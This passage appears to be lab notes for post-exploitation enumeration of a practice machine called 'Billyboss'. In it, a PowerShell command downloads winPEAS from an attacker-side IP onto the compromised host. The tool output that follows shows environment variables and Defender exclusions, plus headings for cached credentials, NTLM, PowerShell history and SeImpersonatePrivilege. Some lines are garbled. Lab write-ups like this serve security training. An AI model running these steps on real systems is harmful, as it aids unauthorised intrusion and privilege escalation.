PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -uri http://192.168.45.245/winPEASx64.exe -Outfile .\winPEASx64.exeDelivery complete
/Practice/Billyboss/4-Post_Enumeration/attachments/{CBE639F4-F784-400C-93B2-EA3ADDAE4BBC}.png) Executing PEAS
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: BILLYBOSS
    USERPROFILE: C:\Users\nathan
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\nathan\AppData\Local
    PSModulePath: C:\Users\nathan\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Users\nathan\Nexus\nexus-3.21.0-05\bin\..\lib;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Users\nathan\AppData\Local\Microsoft\WindowsApps;c:\users\nathan\nexus\nexus-3.21.0-05\jre\bin
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
nce: BypasstionPolicyPrefere
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: nathan
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\nathan\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\nathan\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 1
    APPDATA: C:\Users\nathan\AppData\Roaming
    TMP: C:\Users\nathan\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: BILLYBOSS
 
���������� System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101LAPS
/Practice/Billyboss/4-Post_Enumeration/attachments/{A42A1C07-2030-41B3-A294-B148774581F6}.png)
LSA Protection
/Practice/Billyboss/4-Post_Enumeration/attachments/{1E374F92-135D-47FE-B76E-AEA82495752F}-1.png)
Credentials Guard
/Practice/Billyboss/4-Post_Enumeration/attachments/{150DE550-B109-4328-B8AA-68DFC08364CE}.png)
Cached Creds
/Practice/Billyboss/4-Post_Enumeration/attachments/{0F3A287A-8BD6-463C-AD66-9D111C4BD08A}.png)
AV
/Practice/Billyboss/4-Post_Enumeration/attachments/{8A3288CB-1405-4D48-AEC4-D11D45D47F42}.png)
���������� Windows Defender configuration
  Local Settings
 
  Path Exclusions:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\
    J:\
    K:\
    L:\
    M:\
    N:\
    O:\
    P:\
    Q:\
    R:\
    S:\
    T:\
    U:\
    V:\
    W:\
    X:\
    Y:\
    Z:\
 
  PolicyManagerPathExclusions:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\
    J:\
    K:\
    L:\
    M:\
    N:\
    O:\
    P:\
    Q:\
    R:\
    S:\
    T:\
    U:\
    V:\
    W:\
    X:\
    Y:\
    Z:\
 
  Process Exclusions
    C:\*
    D:\*
    E:\*
    F:\*
    G:\*
    H:\*
    I:\*
    J:\*
    K:\*
    L:\*
    M:\*
    N:\*
    O:\*
    P:\*
    Q:\*
    R:\*
    S:\*
    T:\*
    U:\*
    V:\*
    W:\*
    X:\*
    Y:\*
    Z:\*
  Group Policy SettingsUAC
/Practice/Billyboss/4-Post_Enumeration/attachments/{88BC4F81-C9B2-4AD6-9609-48B500751238}.png)
PowerShell History
/Practice/Billyboss/4-Post_Enumeration/attachments/{A83E4CC8-20C3-4D39-9B24-ACF9CF111B48}.png) 
C:\Users\nathan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Drives
/Practice/Billyboss/4-Post_Enumeration/attachments/{BFCD0A0F-3A7C-4F76-AA67-68CECCCC0C16}.png)
NTLM
/Practice/Billyboss/4-Post_Enumeration/attachments/{A5ECB1F2-CE80-4D9A-8850-821AD53340BB}-1.png)
.NET
/Practice/Billyboss/4-Post_Enumeration/attachments/{BA38C628-83CD-4DA4-9922-64BBFB9D41B6}.png)
Current Token Privileges
/Practice/Billyboss/4-Post_Enumeration/attachments/{4F45F6F0-4F07-4AC7-950A-A9AC01D5EC5C}.png) SeImpersonatePrivilege
This has been already enumerated manually
SeImpersonatePrivilege
This has been already enumerated manually